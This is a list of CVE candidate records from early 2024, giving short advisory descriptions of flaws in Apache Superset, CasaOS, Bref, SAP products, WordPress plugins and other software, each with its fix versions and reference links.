CVE    2024    24772    Candidate    A guest user could exploit a chart data REST API and send arbitrary SQL statements that on error could leak information from the underlying analytics database. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fixes the issue.    MISC:https://lists.apache.org/thread/gfl3ckwy6y9tpz9jmpv62orh2q346sn5   |   URL:https://lists.apache.org/thread/gfl3ckwy6y9tpz9jmpv62orh2q346sn5   |   MLIST:[oss-security] 20240228 CVE-2024-24772: Apache Superset: Improper Neutralisation of custom SQL on embedded context   |   URL:http://www.openwall.com/lists/oss-security/2024/02/28/5    Assigned (20240130)
CVE    2024    24771    Candidate    Open Forms allows users to create and publish smart forms. Versions prior to 2.2.9, 2.3.7, 2.4.5, and 2.5.2 contain a non-exploitable multi-factor authentication weakness. Superusers who have their credentials (username + password) compromised could potentially have the second-factor authentication bypassed if an attacker somehow managed to authenticate to Open Forms. The maintainers of Open Forms do not believe it is or has been possible to perform this login. However, if this were possible, the victim's account may be abused to view (potentially sensitive) submission data or have been used to impersonate other staff accounts to view and/or modify data. Three mitigating factors to help prevent exploitation include: the usual login page (at `/admin/login/`) does not fully log in the user until the second factor was successfully provided; the additional non-MFA protected login page at `/api/v2/api-authlogin/` was misconfigured and could not be used to log in; and there are no additional ways to log in. This also requires credentials of a superuser to be compromised to be exploitable. Versions 2.2.9, 2.3.7, 2.4.5, and 2.5.2 contain the following patches to address these weaknesses: Move and only enable the API auth endpoints (`/api/v2/api-auth/login/`) with `settings.DEBUG = True`. `settings.DEBUG = True` is insecure and should never be applied in production settings. Additionally, apply a custom permission check to the hijack flow to only allow second-factor-verified superusers to perform user hijacking.    MISC:https://github.com/open-formulieren/open-forms/releases/tag/2.2.9   |   URL:https://github.com/open-formulieren/open-forms/releases/tag/2.2.9   |   MISC:https://github.com/open-formulieren/open-forms/releases/tag/2.3.7   |   URL:https://github.com/open-formulieren/open-forms/releases/tag/2.3.7   |   MISC:https://github.com/open-formulieren/open-forms/releases/tag/2.4.5   |   URL:https://github.com/open-formulieren/open-forms/releases/tag/2.4.5   |   MISC:https://github.com/open-formulieren/open-forms/releases/tag/2.5.2   |   URL:https://github.com/open-formulieren/open-forms/releases/tag/2.5.2   |   MISC:https://github.com/open-formulieren/open-forms/security/advisories/GHSA-64r3-x3gf-vp63   |   URL:https://github.com/open-formulieren/open-forms/security/advisories/GHSA-64r3-x3gf-vp63    Assigned (20240129)
CVE    2024    24770    Candidate    vantage6 is an open source framework built to enable, manage and deploy privacy enhancing technologies like Federated Learning and Multi-Party Computation. Much like GHSA-45gq-q4xh-cp53, it is possible to find which usernames exist in vantage6 by calling the API routes `/recover/lost` and `/2fa/lost`. These routes send emails to users if they have lost their password or MFA token. This issue has been addressed in commit `aecfd6d0e` and is expected to ship in subsequent releases. Users are advised to upgrade as soon as a new release is available. There are no known workarounds for this vulnerability.    MISC:https://github.com/vantage6/vantage6/commit/aecfd6d0e83165a41a60ebd52d2287b0217be26b   |   URL:https://github.com/vantage6/vantage6/commit/aecfd6d0e83165a41a60ebd52d2287b0217be26b   |   MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-45gq-q4xh-cp53   |   URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-45gq-q4xh-cp53   |   MISC:https://github.com/vantage6/vantage6/security/advisories/GHSA-5h3x-6gwf-73jm   |   URL:https://github.com/vantage6/vantage6/security/advisories/GHSA-5h3x-6gwf-73jm    Assigned (20240129)
CVE    2024    24768    Candidate    1Panel is an open source Linux server operation and maintenance management panel. The HTTPS cookie that comes with the panel does not have the Secure keyword, which may cause the cookie to be sent in plain text if accessed using HTTP. This issue has been patched in version 1.9.6.    MISC:https://github.com/1Panel-dev/1Panel/commit/1169648162c4b9b48e0b4aa508f9dea4d6bc50d5   |   URL:https://github.com/1Panel-dev/1Panel/commit/1169648162c4b9b48e0b4aa508f9dea4d6bc50d5   |   MISC:https://github.com/1Panel-dev/1Panel/pull/3817   |   URL:https://github.com/1Panel-dev/1Panel/pull/3817   |   MISC:https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-9xfw-jjq2-7v8h   |   URL:https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-9xfw-jjq2-7v8h    Assigned (20240129)
CVE    2024    24767    Candidate    CasaOS-UserService provides user management functionalities to CasaOS. Starting in version 0.4.4.3 and prior to version 0.4.7, CasaOS doesn't defend against password brute force attacks, which leads to having full access to the server. The web application lacks control over the login attempts. This vulnerability allows attackers to get super user-level access over the server. Version 0.4.7 contains a patch for this issue.    MISC:https://github.com/IceWhaleTech/CasaOS-UserService/commit/62006f61b55951048dbace4ebd9e483274838699   |   URL:https://github.com/IceWhaleTech/CasaOS-UserService/commit/62006f61b55951048dbace4ebd9e483274838699   |   MISC:https://github.com/IceWhaleTech/CasaOS-UserService/releases/tag/v0.4.7   |   URL:https://github.com/IceWhaleTech/CasaOS-UserService/releases/tag/v0.4.7   |   MISC:https://github.com/IceWhaleTech/CasaOS-UserService/security/advisories/GHSA-c69x-5xmw-v44x   |   URL:https://github.com/IceWhaleTech/CasaOS-UserService/security/advisories/GHSA-c69x-5xmw-v44x    Assigned (20240129)
CVE    2024    24766    Candidate    CasaOS-UserService provides user management functionalities to CasaOS. Starting in version 0.4.4.3 and prior to version 0.4.7, the CasaOS login page is affected by a username enumeration vulnerability. An attacker can enumerate CasaOS usernames using the application response. If the username is incorrect, the application gives the error `**User does not exist**`. If the password is incorrect, the application gives the error `**Invalid password**`. Version 0.4.7 fixes this issue.    MISC:https://github.com/IceWhaleTech/CasaOS-UserService/commit/c75063d7ca5800948e9c09c0a6efe9809b5d39f7   |   URL:https://github.com/IceWhaleTech/CasaOS-UserService/commit/c75063d7ca5800948e9c09c0a6efe9809b5d39f7   |   MISC:https://github.com/IceWhaleTech/CasaOS-UserService/releases/tag/v0.4.7   |   URL:https://github.com/IceWhaleTech/CasaOS-UserService/releases/tag/v0.4.7   |   MISC:https://github.com/IceWhaleTech/CasaOS-UserService/security/advisories/GHSA-c967-2652-gfjm   |   URL:https://github.com/IceWhaleTech/CasaOS-UserService/security/advisories/GHSA-c967-2652-gfjm    Assigned (20240129)
CVE    2024    24765    Candidate    CasaOS-UserService provides user management functionalities to CasaOS. Prior to version 0.4.7, path filtering of the URL for user avatar image files was not strict, making it possible to get any file on the system. This could allow an unauthorized actor to access, for example, the CasaOS user database, and possibly obtain system root privileges. Version 0.4.7 fixes this issue.    MISC:https://github.com/IceWhaleTech/CasaOS-UserService/commit/3f4558e23c0a9958f9a0e20aabc64aa8fd51840e   |   URL:https://github.com/IceWhaleTech/CasaOS-UserService/commit/3f4558e23c0a9958f9a0e20aabc64aa8fd51840e   |   MISC:https://github.com/IceWhaleTech/CasaOS-UserService/releases/tag/v0.4.7   |   URL:https://github.com/IceWhaleTech/CasaOS-UserService/releases/tag/v0.4.7   |   MISC:https://github.com/IceWhaleTech/CasaOS-UserService/security/advisories/GHSA-h5gf-cmm8-cg7c   |   URL:https://github.com/IceWhaleTech/CasaOS-UserService/security/advisories/GHSA-h5gf-cmm8-cg7c    Assigned (20240129)
CVE    2024    24763    Candidate    JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.    MISC:https://github.com/jumpserver/jumpserver/releases/tag/v3.10.0   |   URL:https://github.com/jumpserver/jumpserver/releases/tag/v3.10.0   |   MISC:https://github.com/jumpserver/jumpserver/security/advisories/GHSA-p2mq-cm25-g4m5   |   URL:https://github.com/jumpserver/jumpserver/security/advisories/GHSA-p2mq-cm25-g4m5    Assigned (20240129)
CVE    2024    24762    Candidate    `python-multipart` is a streaming multipart parser for Python. When using form data, `python-multipart` uses a Regular Expression to parse the HTTP `Content-Type` header, including options. An attacker could send a custom-made `Content-Type` option that is very difficult for the RegEx to process, consuming CPU resources and stalling indefinitely (minutes or more) while holding the main event loop. This means that the process can't handle any more requests, leading to regular expression denial of service. This vulnerability has been patched in version 0.0.7.    MISC:https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4   |   URL:https://github.com/Kludex/python-multipart/commit/20f0ef6b4e4caf7d69a667c54dff57fe467109a4   |   MISC:https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p   |   URL:https://github.com/Kludex/python-multipart/security/advisories/GHSA-2jv5-9r88-3w3p   |   MISC:https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74   |   URL:https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74   |   MISC:https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5   |   URL:https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5   |   MISC:https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238   |   URL:https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238   |   MISC:https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc   |   URL:https://github.com/tiangolo/fastapi/commit/9d34ad0ee8a0dfbbcce06f76c2d5d851085024fc   |   MISC:https://github.com/tiangolo/fastapi/releases/tag/0.109.1   |   URL:https://github.com/tiangolo/fastapi/releases/tag/0.109.1   |   MISC:https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389   |   URL:https://github.com/tiangolo/fastapi/security/advisories/GHSA-qf9m-vfgh-m389    Assigned (20240129)
CVE    2024    24761    Candidate    Galette is a membership management web application for non profit organizations. Starting in version 1.0.0 and prior to version 1.0.2, public pages are per default restricted to only administrators and staff members. From configuration, it is possible to restrict to up-to-date members or to everyone. Version 1.0.2 fixes this issue.    MISC:https://github.com/galette/galette/commit/a5c18bb9819b8da1b3ef58f3e79577083c657fbb   |   URL:https://github.com/galette/galette/commit/a5c18bb9819b8da1b3ef58f3e79577083c657fbb   |   MISC:https://github.com/galette/galette/security/advisories/GHSA-jrqg-mpwv-pxpv   |   URL:https://github.com/galette/galette/security/advisories/GHSA-jrqg-mpwv-pxpv    Assigned (20240129)
CVE    2024    24760    Candidate    mailcow is a dockerized email package, with multiple containers linked in one bridged network. A security vulnerability has been identified in mailcow affecting versions < 2024-01c. This vulnerability potentially allows attackers on the same subnet to connect to exposed ports of a Docker container, even when the port is bound to 127.0.0.1. The vulnerability has been addressed by implementing additional iptables/nftables rules. These rules drop packets for Docker containers on ports 3306, 6379, 8983, and 12345, where the input interface is not `br-mailcow` and the output interface is `br-mailcow`.    MISC:https://github.com/mailcow/mailcow-dockerized/commit/087481ac12bfa5dd715f3630f0b1697be94f7e88   |   URL:https://github.com/mailcow/mailcow-dockerized/commit/087481ac12bfa5dd715f3630f0b1697be94f7e88   |   MISC:https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-gmpj-5xcm-xxx6   |   URL:https://github.com/mailcow/mailcow-dockerized/security/advisories/GHSA-gmpj-5xcm-xxx6    Assigned (20240129)
CVE    2024    24758    Candidate    Undici is an HTTP/1.1 client, written from scratch for Node.js. Undici already cleared Authorization headers on cross-origin redirects, but did not clear `Proxy-Authentication` headers. This issue has been patched in versions 5.28.3 and 6.6.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/nodejs/undici/commit/b9da3e40f1f096a06b4caedbb27c2568730434ef   |   URL:https://github.com/nodejs/undici/commit/b9da3e40f1f096a06b4caedbb27c2568730434ef   |   MISC:https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3   |   URL:https://github.com/nodejs/undici/security/advisories/GHSA-3787-6prv-h9w3    Assigned (20240129)
CVE    2024    24757    Candidate    open-irs is an issue response robot that responds to issues in the installed repository. The `.env` file was accidentally uploaded when working with git actions. This problem is fixed in 1.0.1. Discontinuing all sensitive keys and turning into secrets.    MISC:https://github.com/Degamisu/open-irs/security/advisories/GHSA-7r69-3vwh-wcfr   |   URL:https://github.com/Degamisu/open-irs/security/advisories/GHSA-7r69-3vwh-wcfr    Assigned (20240129)
CVE    2024    24756    Candidate    Crafatar serves Minecraft avatars based on the skin for use in external applications. Files outside of the `lib/public/` directory can be requested from the server. Instances running behind Cloudflare (including crafatar.com) are not affected. Instances using the Docker container as shown in the README are affected, but only files within the container can be read. By default, all of the files within the container can also be found in this repository and are not confidential. This vulnerability is patched in 2.1.5.    MISC:https://github.com/crafatar/crafatar/blob/e0233f2899a3206a817d2dd3b80da83d51c7a726/lib/server.js#L64-L67   |   URL:https://github.com/crafatar/crafatar/blob/e0233f2899a3206a817d2dd3b80da83d51c7a726/lib/server.js#L64-L67   |   MISC:https://github.com/crafatar/crafatar/commit/bba004acc725b362a5d2d5dfe30cf60e7365a373   |   URL:https://github.com/crafatar/crafatar/commit/bba004acc725b362a5d2d5dfe30cf60e7365a373   |   MISC:https://github.com/crafatar/crafatar/security/advisories/GHSA-5cxq-25mp-q5f2   |   URL:https://github.com/crafatar/crafatar/security/advisories/GHSA-5cxq-25mp-q5f2    Assigned (20240129)
CVE    2024    24755    Candidate    discourse-group-membership-ip-block is a discourse plugin that adds support for adding users to groups based on their IP address. discourse-group-membership-ip-block was sending all group custom fields to the client, including group custom fields from other plugins which may expect their custom fields to remain secret.    MISC:https://github.com/discourse/discourse-group-membership-ip-block/commit/b394d61b0bdfd18a2d8310aa5cf26cccf8bd31c1   |   URL:https://github.com/discourse/discourse-group-membership-ip-block/commit/b394d61b0bdfd18a2d8310aa5cf26cccf8bd31c1   |   MISC:https://github.com/discourse/discourse-group-membership-ip-block/security/advisories/GHSA-r38c-cp8w-664m   |   URL:https://github.com/discourse/discourse-group-membership-ip-block/security/advisories/GHSA-r38c-cp8w-664m    Assigned (20240129)
CVE    2024    24754    Candidate    Bref enables serverless PHP on AWS Lambda. When Bref is used with the Event-Driven Function runtime and the handler is a `RequestHandlerInterface`, then the Lambda event is converted to a PSR7 object. During the conversion process, if the request is a MultiPart, each part is parsed and its content added in the `$files` or `$parsedBody` arrays. The conversion process produces a different output compared to the one of plain PHP when keys ending with an open square bracket ([) are used. Based on the application logic the difference in the body parsing might lead to vulnerabilities and/or undefined behaviors. This vulnerability is patched in 2.1.13.    MISC:https://github.com/brefphp/bref/commit/c77d9f5abf021f29fa96b5720b7b84adbd199092   |   URL:https://github.com/brefphp/bref/commit/c77d9f5abf021f29fa96b5720b7b84adbd199092   |   MISC:https://github.com/brefphp/bref/security/advisories/GHSA-82vx-mm6r-gg8w   |   URL:https://github.com/brefphp/bref/security/advisories/GHSA-82vx-mm6r-gg8w    Assigned (20240129)
CVE    2024    24753    Candidate    Bref enable serverless PHP on AWS Lambda. When Bref is used in combination with an API Gateway with the v2 format, it does not handle multiple values headers. If PHP generates a response with two headers having the same key but different values only the latest one is kept. If an application relies on multiple headers with the same key being set for security reasons, then Bref would lower the application security. For example, if an application sets multiple `Content-Security-Policy` headers, then Bref would just reflect the latest one. This vulnerability is patched in 2.1.13.    MISC:https://github.com/brefphp/bref/commit/f834027aaf88b3885f4aa8edf6944ae920daf2dc   |   URL:https://github.com/brefphp/bref/commit/f834027aaf88b3885f4aa8edf6944ae920daf2dc   |   MISC:https://github.com/brefphp/bref/security/advisories/GHSA-99f9-gv72-fw9r   |   URL:https://github.com/brefphp/bref/security/advisories/GHSA-99f9-gv72-fw9r    Assigned (20240129)
CVE    2024    24752    Candidate    Bref enable serverless PHP on AWS Lambda. When Bref is used with the Event-Driven Function runtime and the handler is a `RequestHandlerInterface`, then the Lambda event is converted to a PSR7 object. During the conversion process, if the request is a MultiPart, each part is parsed and for each which contains a file, it is extracted and saved in `/tmp` with a random filename starting with `bref_upload_`. The flow mimics what plain PHP does but it does not delete the temporary files when the request has been processed. An attacker could fill the Lambda instance disk by performing multiple MultiPart requests containing files. This vulnerability is patched in 2.1.13.    MISC:https://github.com/brefphp/bref/commit/350788de12880b6fd64c4c318ba995388bec840e   |   URL:https://github.com/brefphp/bref/commit/350788de12880b6fd64c4c318ba995388bec840e   |   MISC:https://github.com/brefphp/bref/security/advisories/GHSA-x4hh-frx8-98r5   |   URL:https://github.com/brefphp/bref/security/advisories/GHSA-x4hh-frx8-98r5    Assigned (20240129)
CVE    2024    24751    Candidate    sf_event_mgt is an event management and registration extension for the TYPO3 CMS based on ExtBase and Fluid. In affected versions the existing access control check for events in the backend module got broken during the update of the extension to TYPO3 12.4, because the `RedirectResponse` from the `$this->redirect()` function was never handled. This issue has been addressed in version 7.4.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/derhansen/sf_event_mgt/commit/a08c2cd48695c07e462d15eeb70434ddc0206e4c   |   URL:https://github.com/derhansen/sf_event_mgt/commit/a08c2cd48695c07e462d15eeb70434ddc0206e4c   |   MISC:https://github.com/derhansen/sf_event_mgt/security/advisories/GHSA-4576-pgh2-g34j   |   URL:https://github.com/derhansen/sf_event_mgt/security/advisories/GHSA-4576-pgh2-g34j    Assigned (20240129)
CVE    2024    24750    Candidate    Undici is an HTTP/1.1 client, written from scratch for Node.js. In affected versions calling `fetch(url)` and not consuming the incoming body (or consuming it very slowly) will lead to a memory leak. This issue has been addressed in version 6.6.1. Users are advised to upgrade. Users unable to upgrade should make sure to always consume the incoming body.    MISC:https://github.com/nodejs/undici/commit/87a48113f1f68f60aa09abb07276d7c35467c663   |   URL:https://github.com/nodejs/undici/commit/87a48113f1f68f60aa09abb07276d7c35467c663   |   MISC:https://github.com/nodejs/undici/security/advisories/GHSA-9f24-jqhm-jfcw   |   URL:https://github.com/nodejs/undici/security/advisories/GHSA-9f24-jqhm-jfcw    Assigned (20240129)
CVE    2024    24748    Candidate    Discourse is an open source platform for community discussion. In affected versions an attacker can learn that a secret subcategory exists under a public category which has no public subcategories. The issue is patched in the latest stable, beta and tests-passed version of Discourse. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/discourse/discourse/commit/819361ba28f86a1347059af300bb5cca690f9193   |   URL:https://github.com/discourse/discourse/commit/819361ba28f86a1347059af300bb5cca690f9193   |   MISC:https://github.com/discourse/discourse/security/advisories/GHSA-3qh8-xw23-cq4x   |   URL:https://github.com/discourse/discourse/security/advisories/GHSA-3qh8-xw23-cq4x    Assigned (20240129)
CVE    2024    24747    Candidate    MinIO is a High Performance Object Storage. When someone creates an access key, it inherits the permissions of the parent key. Not only for `s3:*` actions, but also `admin:*` actions. Which means unless somewhere above in the access-key hierarchy, the `admin` rights are denied, access keys will be able to simply override their own `s3` permissions to something more permissive. The vulnerability is fixed in RELEASE.2024-01-31T20-20-33Z.    MISC:https://github.com/minio/minio/commit/0ae4915a9391ef4b3ec80f5fcdcf24ee6884e776   |   URL:https://github.com/minio/minio/commit/0ae4915a9391ef4b3ec80f5fcdcf24ee6884e776   |   MISC:https://github.com/minio/minio/releases/tag/RELEASE.2024-01-31T20-20-33Z   |   URL:https://github.com/minio/minio/releases/tag/RELEASE.2024-01-31T20-20-33Z   |   MISC:https://github.com/minio/minio/security/advisories/GHSA-xx8w-mq23-29g4   |   URL:https://github.com/minio/minio/security/advisories/GHSA-xx8w-mq23-29g4    Assigned (20240129)
CVE    2024    24743    Candidate    SAP NetWeaver AS Java (CAF - Guided Procedures) - version 7.50, allows an unauthenticated attacker to submit a malicious request with a crafted XML file over the network, which when parsed will enable him to access sensitive files and data but not modify them. There are expansion limits in place so that availability is not affected.    MISC:https://me.sap.com/notes/3426111   |   URL:https://me.sap.com/notes/3426111   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240129)
CVE    2024    24742    Candidate    SAP CRM WebClient UI - version S4FND 102, S4FND 103, S4FND 104, S4FND 105, S4FND 106, WEBCUIF 701, WEBCUIF 731, WEBCUIF 746, WEBCUIF 747, WEBCUIF 748, WEBCUIF 800, WEBCUIF 801, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. An attacker with low privileges can cause limited impact to integrity of the application data after successful exploitation. There is no impact on confidentiality and availability.    MISC:https://me.sap.com/notes/3158455   |   URL:https://me.sap.com/notes/3158455   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240129)
CVE    2024    24741    Candidate    SAP Master Data Governance for Material Data - versions 618, 619, 620, 621, 622, 800, 801, 802, 803, 804, does not perform necessary authorization check for an authenticated user, resulting in escalation of privileges. This could allow an attacker to read some sensitive information but no impact to integrity and availability.    MISC:https://me.sap.com/notes/2897391   |   URL:https://me.sap.com/notes/2897391   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240129)
CVE    2024    24740    Candidate    SAP NetWeaver Application Server (ABAP) - versions KERNEL 7.53, KERNEL 7.54, KERNEL 7.77, KERNEL 7.85, KERNEL 7.89, KERNEL 7.93, KERNEL 7.94, KRNL64UC 7.53, under certain conditions, allows an attacker to access information which could otherwise be restricted with low impact on confidentiality of the application.    MISC:https://me.sap.com/notes/3360827   |   URL:https://me.sap.com/notes/3360827   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240129)
CVE    2024    2474    Candidate    The Standout Color Boxes and Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'color-button' shortcode in all versions up to, and including, 0.7.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://wordpress.org/plugins/standout-color-boxes-and-buttons/   |   URL:https://wordpress.org/plugins/standout-color-boxes-and-buttons/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a826dff8-60ae-4e25-9d3e-be93f192aaca?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a826dff8-60ae-4e25-9d3e-be93f192aaca?source=cve    Assigned (20240314)
CVE    2024    24739    Candidate    SAP Bank Account Management (BAM) allows an authenticated user with restricted access to use functions which can result in escalation of privileges with low impact on confidentiality, integrity and availability of the application.    MISC:https://me.sap.com/notes/2637727   |   URL:https://me.sap.com/notes/2637727   |   MISC:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html   |   URL:https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html    Assigned (20240129)
CVE    2024    24736    Candidate    The POP3 service in YahooPOPs (aka YPOPs!) 1.6 allows a remote denial of service (reboot) via a long string to TCP port 110, a related issue to CVE-2004-1558.    MISC:https://packetstormsecurity.com/files/176784/YahooPOPs-1.6-Denial-Of-Service.html    Assigned (20240129)
CVE    2024    24725    Candidate    Gibbon through 26.0.00 allows remote authenticated users to conduct PHP deserialization attacks via columnOrder in a POST request to the modules/System%20Admin/import_run.php&type=externalAssessment&step=4 URI.    MISC:https://gibbonedu.org/download/   |   MISC:https://www.exploit-db.com/exploits/51903    Assigned (20240127)
CVE    2024    24722    Candidate    An unquoted service path vulnerability in the 12d Synergy Server and File Replication Server components may allow an attacker to gain elevated privileges via the 12d Synergy Server and/or 12d Synergy File Replication Server executable service path. This is fixed in 4.3.10.192, 5.1.5.221, and 5.1.6.235.    CONFIRM:https://help.12dsynergy.com/v1/docs/cve-2024-24722   |   MISC:https://files.12dsynergy.com/downloads/download.aspx   |   MISC:https://www.12dsynergy.com/security-statement/    Assigned (20240127)
CVE    2024    24721    Candidate    An issue was discovered on Innovaphone PBX before 14r1 devices. The password form, used to authenticate, allows a Brute Force Attack through which an attacker may be able to access the administration panel.    MISC:https://excellium-services.com/cert-xlm-advisory/CVE-2024-24721    Assigned (20240127)
CVE    2024    24720    Candidate    An issue was discovered on Innovaphone PBX before 14r1 devices. It provides different responses to incoming requests in a way that reveals information to an attacker.    MISC:https://excellium-services.com/cert-xlm-advisory/CVE-2024-24720    Assigned (20240127)
CVE    2024    24719    Candidate    Missing Authorization vulnerability in Uriahs Victor Location Picker at Checkout for WooCommerce. This issue affects Location Picker at Checkout for WooCommerce: from n/a through 1.8.9.    MISC:https://patchstack.com/database/vulnerability/map-location-picker-at-checkout-for-woocommerce/wordpress-kikote-plugin-1-8-9-broken-access-control-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/map-location-picker-at-checkout-for-woocommerce/wordpress-kikote-plugin-1-8-9-broken-access-control-vulnerability?_s_id=cve    Assigned (20240126)
CVE    2024    24718    Candidate    Missing Authorization vulnerability in PropertyHive. This issue affects PropertyHive: from n/a through 2.0.6.    MISC:https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-6-missing-authorization-to-non-arbitrary-plugin-installation-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/propertyhive/wordpress-propertyhive-plugin-2-0-6-missing-authorization-to-non-arbitrary-plugin-installation-vulnerability?_s_id=cve    Assigned (20240126)
CVE    2024    24717    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mark Kinchin Beds24 Online Booking allows Stored XSS. This issue affects Beds24 Online Booking: from n/a through 2.0.23.    MISC:https://patchstack.com/database/vulnerability/beds24-online-booking/wordpress-beds24-online-booking-plugin-2-0-23-admin-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/beds24-online-booking/wordpress-beds24-online-booking-plugin-2-0-23-admin-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240126)
CVE    2024    24714    Candidate    Unrestricted Upload of File with Dangerous Type vulnerability in bPlugins LLC Icons Font Loader. This issue affects Icons Font Loader: from n/a through 1.1.4.    MISC:https://patchstack.com/database/vulnerability/icons-font-loader/wordpress-icons-font-loader-plugin-1-1-4-arbitrary-file-upload-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/icons-font-loader/wordpress-icons-font-loader-plugin-1-1-4-arbitrary-file-upload-vulnerability?_s_id=cve    Assigned (20240126)
CVE    2024    24713    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Auto Listings Auto Listings – Car Listings & Car Dealership Plugin for WordPress allows Stored XSS. This issue affects Auto Listings – Car Listings & Car Dealership Plugin for WordPress: from n/a through 2.6.5.    MISC:https://patchstack.com/database/vulnerability/auto-listings/wordpress-auto-listings-plugin-2-6-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/auto-listings/wordpress-auto-listings-plugin-2-6-5-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240126)
CVE    2024    24712    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Team Heateor Heateor Social Login WordPress allows Stored XSS. This issue affects Heateor Social Login WordPress: from n/a through 1.1.30.    MISC:https://patchstack.com/database/vulnerability/heateor-social-login/wordpress-heateor-social-login-plugin-1-1-30-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/heateor-social-login/wordpress-heateor-social-login-plugin-1-1-30-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240126)
CVE    2024    24711    Candidate    Missing Authorization vulnerability in weDevs WooCommerce Conversion Tracking. This issue affects WooCommerce Conversion Tracking: from n/a through 2.0.11.    MISC:https://patchstack.com/database/vulnerability/woocommerce-conversion-tracking/wordpress-woocommerce-conversion-tracking-plugin-2-0-11-broken-access-control-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/woocommerce-conversion-tracking/wordpress-woocommerce-conversion-tracking-plugin-2-0-11-broken-access-control-csrf-vulnerability?_s_id=cve    Assigned (20240126)
CVE    2024    24708    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in W3speedster W3SPEEDSTER. This issue affects W3SPEEDSTER: from n/a through 7.19.    MISC:https://patchstack.com/database/vulnerability/w3speedster-wp/wordpress-w3speedster-plugin-7-19-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/w3speedster-wp/wordpress-w3speedster-plugin-7-19-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240126)
CVE    2024    24706    Candidate    Cross-Site Request Forgery (CSRF) vulnerability in Forum One WP-CFM wp-cfm. This issue affects WP-CFM: from n/a through 1.7.8.    MISC:https://github.com/forumone/wp-cfm/security/advisories/GHSA-2449-jmfc-gc7f   |   URL:https://github.com/forumone/wp-cfm/security/advisories/GHSA-2449-jmfc-gc7f   |   MISC:https://patchstack.com/database/vulnerability/wp-cfm/wordpress-wp-cfm-plugin-1-7-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/wp-cfm/wordpress-wp-cfm-plugin-1-7-8-cross-site-request-forgery-csrf-vulnerability?_s_id=cve    Assigned (20240126)
